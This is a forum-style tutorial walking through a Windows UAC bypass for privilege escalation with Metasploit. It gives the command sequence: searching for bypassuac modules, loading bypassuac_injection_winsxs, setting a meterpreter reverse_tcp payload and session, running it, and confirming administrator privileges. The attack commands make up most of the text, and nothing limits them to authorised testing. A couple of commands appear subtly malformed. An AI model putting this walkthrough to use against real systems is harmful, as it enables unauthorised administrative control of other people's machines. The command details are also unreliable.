MITRE ATT&CK - UAC Bypass Privilege Escalation

[ltx_Lazzarus]

This whole "privilege escalation" thing can be a real beaut for snagging some top-shelf permissions on the ol' system or network. Sometimes, ya can just waltz right in with a basic pass, but to really get the job done, you need to be packing some serious clout.
The way I see it, the most common ways to pull this off are by finding the weak spots, the dodgy setups, and the downright vulnerabilities in the system.
---------------------------------------------------------
Privilege Escalation on Windows:
Our goal here is to get a bit more juice on those Windows systems we're working with. We're talking about elevating our privileges.
---------------------------------------------------------
Requirements:
- Kali Linux or Parrot OS

UAC BYPASS
If you're looking to get a bit more clout on the system, you can try bypassing that whole User Account Control (UAC) business. See, Windows has this thing called UAC that lets programs boost their permissions, from low to high, to do their thing. But sometimes, you can skip past that whole user confirmation rigmarole and just get the job done.

Did you know Metasploit's got a bunch of handy dandy modules for bypassing that whole User Account Control (UAC) business? Reckon we can use those to really boost our permissions on those Windows 7 and Windows 10 systems.

Code: Select all

meterpreter> background

To get the ball rolling, all you gotta do is run a quick search. Just fire up that terminal and type:

Code: Select all

msf> search bypassuac

After having a gander at the options, it looks like the "bypassuac_injection_winsxs" module is the way to go for us. See, it's the only one that's been proven to work a treat on those Windows 10 systems:


Load the bypass UAC module typing this command:

Code: Select all

msf> use module exploit/windows/local/bypassuac_injection_winsxs

Now that we've got that UAC bypass module all loaded up, it's time to get it configured just right. We'll need to run a few quick commands to make sure everything's shipshape:

Code: Select all

msf> set payload windows/x64/meterpreter/reverse_tcp

Code: Select all

msf> set target WIndows x64

Code: Select all

msf> set SESSION <SESSION-ID>

We've got the module all set up, for execute the module, type:

Code: Select all

msf> run

If all went according to plan, we should be seeing an elevated meterpreter session on that target system:


Let's take a quick peek under the hood and see what kind of permissions we're rocking with this elevated session. We can do that by running a simple command in the meterpreter:

Code: Select all

meterpreter> getprivs

Turns out we've got the whole kit and caboodle - administrative privileges.